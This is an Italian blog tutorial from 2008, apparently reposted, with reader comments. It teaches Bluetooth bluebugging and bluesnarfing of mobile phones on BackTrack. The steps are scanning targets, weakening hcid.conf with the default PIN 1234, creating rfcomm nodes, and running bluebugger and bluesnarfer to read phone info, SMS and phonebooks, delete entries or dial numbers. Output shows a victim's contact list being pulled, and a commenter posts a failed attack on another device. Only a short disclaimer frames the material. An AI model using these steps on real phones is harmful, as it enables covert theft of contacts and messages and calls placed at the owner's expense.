Sei sulla pagina 1di 13

Bluetooth Sniff with Bluebugger & Bluesnarfer

Ciao a tutti,
eccoci arrivati a descrivere un nuovo campo di lavoro per noi del back|track~blog , st parlando come da titolo del Bluetooth sniffer.
I tool che useremo sono il Bluebugger ed il Bluesnarfer.
Il Bluebugger un prodotto della Codito.de , ossia il sito di Martin J. Muench developper di BackTrack.
Prima di comunciare doveroso dirvi che ovviamente per provare/testare questo tutorial avete bisogno di un Bluetooth device regolarmente
riconosciuto da BackTrack , per essere sicuri potete vedere su Google cosa riconosciuto o meno dai sistemi basati su GNU/Linux in generale ,
oppure lasciate qualche commento e vediamo cosa riusciamo a fare , oppure ancora entrate in canale e chiedete.
Ma iniziamo il nostro lavoro..
Appena entriamo in BT , inseriamo la nostra chiavetta usb-bluetooth , e vediamo subito se il dispositivo riconosciuto dal sistema dando da konsole
il comando:
hciconfig
vedremo subito se il dispositio riconosciuto , dopodich per attivarlo basta dare il comando:
hciconfig hci0 up
Questo perch il mio dispositivo visto da BT come hci0 , (hci-zero) , ma finora non ho sentito di dispositivi bluetooth indicati da BT con sigle
diverse.
Per essere sicuri che il vostro dispositivo stia lavorando date da konsole il comando:
hciconfig -a
Dovrebbe restituirvi tutta la configurazione del dispositivo.
Ora , in BT ci sono una serie di strumenti per l utilizzo in vario modo di connessioni bluetooth chiamati Bluez , e noi iniziamo con il Hcitool , e lo
facciamo tramite un piccolo scanning , dando da konsole il comando:
hcitool scan hci0
Questo il risultato che a me restituisce BT dopo aver messo in connettivit bluetooth il mio telefono cellulare:
[root@bt ~]$ hcitool scan hci0

Scanning
00:15:B9:57:80:C0 HaCkLaB-PH
Se non vi vedete arrivare nessun risultato provate a dare il comando BTscanner , oppure ancora a lanciare il BTscanner da backtrck>RadioNetworkAnalisys->Bluetooth->
Oppure ancora , suate sicuri dell attivit del cellulare.
Questo il risultato dato dal mio cellulare , ma in caso di un attacco , o meglio di uno sniffing sarebbe stata la stessa cosa , il sistema mi avrebbe
restituito tutti i MacAddress ,(BD) , che avevano il bluetooth attivato , e vi assicuro che provando in una casa isolata non c scampo , ma se vi mettete
in un aeroporto in una stazione o in un luogo del genere potete immaginare voi lo sniffing che un malintenzionato potrebbe fare.
Ecco infatti appena utilizziamo un altro tool , l sdptool , cosa riusciamo a vedere nel dispositivo:
brigante ~HaCkLaB.WiFu # sdptool browse 00:15:B9:57:80:C0
Browsing 00:15:B9:57:80:C0
Service Name: QC Voice Gateway
Service RecHandle: 0x10000
Service Class ID List:
Headset Audio Gateway (0x1112)
Generic Audio (0x1203)
Protocol Descriptor List:
L2CAP (0x0100)
RFCOMM (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
Headset (0x1108)
Version: 0x0100
Service Name: QC Voice Gateway
Service RecHandle: 0x10001
Service Class ID List:
Handfree Audio Gateway (0x111f)
Generic Audio (0x1203)

Protocol Descriptor List:


L2CAP (0x0100)
RFCOMM (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
Handsfree (0x111e)
Version: 0x0101
Service Name: FTP
Service RecHandle: 0x10002
Service Class ID List:
OBEX File Transfer (0x1106)
Protocol Descriptor List:
L2CAP (0x0100)
RFCOMM (0x0003)
Channel: 16
OBEX (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
OBEX File Transfer (0x1106)
Version: 0x0100
Service Name: OPP
Service RecHandle: 0x10003
Service Class ID List:
OBEX Object Push (0x1105)
Protocol Descriptor List:
L2CAP (0x0100)
RFCOMM (0x0003)

Channel: 17
OBEX (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
OBEX Object Push (0x1105)
Version: 0x0100
Service Name: Serial Port
Service RecHandle: 0x10004
Service Class ID List:
Serial Port (0x1101)
Protocol Descriptor List:
L2CAP (0x0100)
RFCOMM (0x0003)
Channel: 18
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
Serial Port (0x1101)
Service Name: Dial-up Networking
Service RecHandle: 0x10005
Service Class ID List:
Dialup Networking (0x1103)
Protocol Descriptor List:
L2CAP (0x0100)
RFCOMM (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a

base_offset: 0x100
Profile Descriptor List:
Dialup Networking (0x1103)
Version: 0x0100
Bene , arrivati a questo punto voi direte , ma alla fine non che hai ricavato molto , sono solo notizie riguardanti le porta di comunicazione , ma
abbiate solo un p di pazienza.
Tramite la konsole ed un editor di testi , nel mio caso Kate , apritevi il file di configurazione di Hdci , diamo quindi da konsole il comando:
kate /etc/bluetooth/hcid.conf
Al suo interno , andate a sostituire il tutto con le stringhe seguenti:
Sia chiaro che consiglio caldamente a tutti di farsi i propri backup , non rovinatevi la vita se non siete sicuri di ci che fate.
Attenzione:
***
1 ***</div>
2 <code>#
3 # HCI daemon configuration file.
4 #</code>
5
6 # HCId options
7 options {
8 # Automatically initialize new devices
9 autoinit yes;
10
11 # Security Manager mode
12 #
none - Security manager disabled
13 #
auto - Use local PIN for incoming connections
14 #
user - Always ask user for a PIN
15 #
16 security auto;
17
18 # Pairing mode
19 #
none - Pairing disabled
20 #
multi - Allow pairing with already paired devices

21 #
once - Pair once and deny successive attempts
22 pairing multi;
23
24 # Default PIN code for incoming connections
25 passkey "1234";
26 }
27
28 # Default settings for HCI devices
29 device {
30 # Local device name
31 #
%d - device id
32 #
%h - host name
33 name "device1";
34
35 # Local device class
36 class 0x000000;
37
38 # Default packet type
39 #pkt_type DH1,DM1,HV1;
40
41 # Inquiry and Page scan
42 iscan enable; pscan enable;
43
44 # Default link mode
45 #
none
- no specific policy
46 #
accept - always accept incoming connections
47 #
master - become master on incoming connections,
48 #
deny role switch on outgoing connections
49 lm accept,master;
50
51 # Default link policy
52 #
none
- no specific policy
53 #
rswitch - allow role switch
54 #
hold
- allow hold mode

sniff
- allow sniff mode
55 #
park
- allow park mode
56 #
lp
rswitch,hold,sniff,park;
57
58 auth enable;
59 encrypt enable;
60 }
61 <p align="center">***
***
Ora stato inserito come PIN , 1234 le 4 cifre internazionalmente di default sulla maggiorparte dei cellulari , ma tramite le opzioni a disposizione ,
e sempre in caso di un vero attacco , si sarebbe potuto pensare ad un attacco tramite brute-forcing. e comunque chi usa spesso il bluetooth non credo
vogliastare sempre l a digitare il PIN.
Fatto questo , salvate il tutto sovrascrivendo quindi totalmente il file di configurazione di Hdi , e date di nuovo da konsole per un nuovo UPil comando
hciconfig -a
vi verr restituito nuovamente il messaggio in stile con quello precedentemente ricavato tramite lo stesso comando , solo che noterete qualche piccolo
cambiamento dato che , come potete vedere dalle righe stesse , abbiamo abilitato lo sniffing.
Ora facciamo il restart del dispositivo e ssociamovi i permessi ideali con i seguen ti comandi:
bash /etc/rc.d/rc.bluetooth restart
Dopodich:
mknod -m 666 /dev/rfcomm0 c 216 3
mknod -m 666 /dev/rfcomm1 c 216 6
mknod -m 666 /dev/rfcomm2 c 216 7
Come potete benissimo notare non abbiamo fatto altro che creare prima ed associare poi tre connessioni che rispettivamente andranno ad occupare tre
diversi canali , il primo RFCOMM0 nel canale 3 DUN Dial UP ; Il secondo RFCOMM1 attivo sulcanale 6 FTP , ed il terzo RFCOMM2 attivo nel
canale 7 chiamato OBEX push.
Andiamo ora ad aggiungere i canali attivi al tool sdptool , da konsole quindi:
sdptool add channel=3 DUN
sdptool add channel=6 FTP
sdptool add channel=7 OPUSH

Dopo aver configurato il tutto correttamente passiamo ora alla parte dello sniffing
Per far lavorare i due programmi che ci servono per lo sniffing , non dobbiamo fare altro che lanciarli da Shell , oppure se si vuole ottenere
direttamente la shell con il men , vi basta lanciarli dal KdeMenuStart->BckTrack->Radio&NetworkAnalisys->Bluetooth->..
brigante ~HaCkLaB.WiFu # bluebugger
bluebugger 0.1 ( MaJoMu | http://www.codito.de )

Usage: bluebugger [OPTIONS] -a <addr> [MODE]


-a <addr> = Bluetooth address of target
Options:

-m <name> = Name to use when connecting (default: )


-d <device> = Device to use (default: /dev/rfcomm)
-c <channel> = Channelto use (default: 17)
-n = No device name lookup
-t <timeout> = Timeout in seconds for name lookup (default: 5)
-o <file> = Write output to <file>
Mode:

info = Read Phone Info (default)


phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial <num> = Dial number
ATCMD = Custom Command (e.g. +GMI)
Note: Modes can be combined, e.g. info phonebook +GMI
* You have to set txxhe target address
Associamo al comando una nostra stringa , solo per fare una prova.
brigante ~HaCkLaB.WiFu # bluebugger -a 00:15:B9:57:80:C0 info

bluebugger 0.1 ( MaJoMu | http://www.codito.de )

Target Device: 00:15:B9:57:80:C0


Target Name: HaCkLaB-PH
tcgetattr failed: Input/output error
bt_rfcomm_config() failed
done
Qu il mio telefono si blocca e mi restituisce l autorizzazione allo scambio di dialogo : (
Proviamo invece a vedere con il bluesnarfer cosa succede con un cellulare diverso (un p pi vecchiotto a dire il vero.).
Queste le opzioni del Bluesnarfer:
brigante ~HaCkLaB.WiFu # bluesnarfer
bluesnarfer: you must set bd_addr
bluesnarfer, version 0.1 usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD : valid AT+CMD (GSM EXTENSION)
TYPE : valid phonebook type ..
example : DC (dialed call list)
SM (SIM phonebook)
RC (recevied call list)
XX much more
-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action


-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search name in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
[root@bt ~]$ bluesnarfer -r -1-100 -b 00:79:S9:77:99:R0
+1 Angelo 049936XXXX
+2 Anta 049936XXXX
+3 AntonellaP 049936XXXX
+4 Giuseppe 049936XXXX
+5 Zio AXXXX 0XXX5XXX56
E la lista potrebbe continuare fino a nostro piacimento
In questo caso il Bluesnarfing ha funzionato benissimo , se eravamo dei malintenzionati , e se solo avessimo voluto avremmo potuto ricevere e
cancellare tutta la lista di numeri che erano in rubrica sul telefono.
Le opzioni poi potete vederle benissimo , c dallo sniffing dei messaggi , fino al Dial-UP , ossia la possibilit di chiamare in quiet un qualsiasi
numero di telefono utilizzando la linea del cellulare attaccato.
Capirete quindi in condizioni ideali che strumento possiamo avere a disposizione.
Oggi gli strumenti mediatici che usano il bluetooth sono moltissimi , non solo cellulari , ma palmari , stampanti , tutti gli strumenti che posso essere
collegati ad un pc , e stando ai test che ho fatto , si riesce a trovare compatibilit e riuscita , almeno una volta su cinque.
Lo sniffing con dispositivi bluetooth una cosa attraente ma anche molto pericolosa , ricordate che le tracce del segnale del vostro telefono sono
monitorate quindi spero che non pensiate minimamente di trarre da questo tutorial notizie che possano servirvi a scopi illegali .come sempre ,
nessuno si prender responsabilit a riguardo.
Detto questo , in campo di telefonia come del resto riguarda l hardware in genere se si ha il mezzo giusto , ed in questo caso il nostro telefono cellulare
, si possono arrivare a fare delle belle prove , ma a volte com successo a me, per configurare il dispositivo possono passare delle giornate.
Sto cercando di fare l UPload di un vecchio video realizzato con Audithor , e creato sempre dal team di remote-exploit , appena posso lo linko nella
pagina dei video , in modo tale da poter rendere bene l idea.

Ciao a tutti e alla prossima.


La parte di configurazione del tutorial stata presa da un thrade di Dr_GreeN sul Forums.Remote-exploit , l esperimento nostro.
About these ads

Articoli collegati
BackTrack storyIn "/General"
Installazione e configurazione di Nessus in BackTrackIn "/Installation"
KDE : configurazioneIn "/Configure"
febbraio 24, 2008
Categorie: /Radio-Network-Analisys . . Author: brigante
6 commenti
1. Commento di def on febbraio 24, 2008 6:34 pm
Ancora compliments! :-)
Car Whisperer lhai mai provato?!?
E un tool molto carino! Ihihi
http://trifinite.org/trifinite_stuff_carwhisperer.html
Rispondi
2. Commento di brigante~ on febbraio 25, 2008 8:48 am
appena fatto il download.
appena posso gli d una buona occhiata.
thanx! ;)
Rispondi
3. Commento di ElioDarkDream on aprile 13, 2008 7:06 pm

ciao cerkavo brigante~ x kiedergli km fare a configurare la boot sector x fare convivere xp e backtrack 3 se ci 6 potresti aggiungermi su msn x
favo ??? eliodarkdream-@-hotmail.it thx molte mi serve tntiximo qlkuno su kui basarmi.. XDXD
Rispondi
4. Commento di Crash88 on dicembre 6, 2008 2:09 am
ciao :) ho letto questa guida molto interessante bravo senti pero c-e un problema so che non si possono fare domande pero sul chan di IRC
Azzurra non rispondete mai.
bluebugger 0.1 ( MaJoMu | http://www.codito.de )

Target Device: XX:XX:XX:XX:XX:XX


Target Name: Crash
Cannot open /dev/rfcomm0: Connection refused
bt ~ # /dev.rfcomm0
-bash: /dev.rfcomm0: No such file or directory
bt ~ # /dev/rfcomm0
-bash: /dev/rfcomm0: No such file or directory
bt ~ # cd /dev/rfcomm0
-bash: cd: /dev/rfcomm0: No such file or directory
bt ~ # bluesnarfer -r -1-100 -b 00:1D:6E:A8:24:29
bluesnarfer: hci_read_remote_name failed
bluesnarfer: unable to get device name
bluesnarfer: open /dev/rfcomm0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok
Mi puoi aiutare pls :(??
Rispondi
5. Commento di brigante~ on dicembre 6, 2008 3:28 am
Connection refused > non ti f capire che la connessione impossibilitata ?
o il bluetooth non configurato bene o non riesce a vedere il telefono per altri motivi che non spieghi.
ciao.

Rispondi
6. Commento di brigante~ on dicembre 6, 2008 3:30 am
P.S.:
se spiegi la procedura passo passo magari scrivi nella mailinglist che hai tutto lo spazio che vuoi , ma fai tutti i passaggi descritti nella guida e
riporta gli eventuali errori.
Rispondi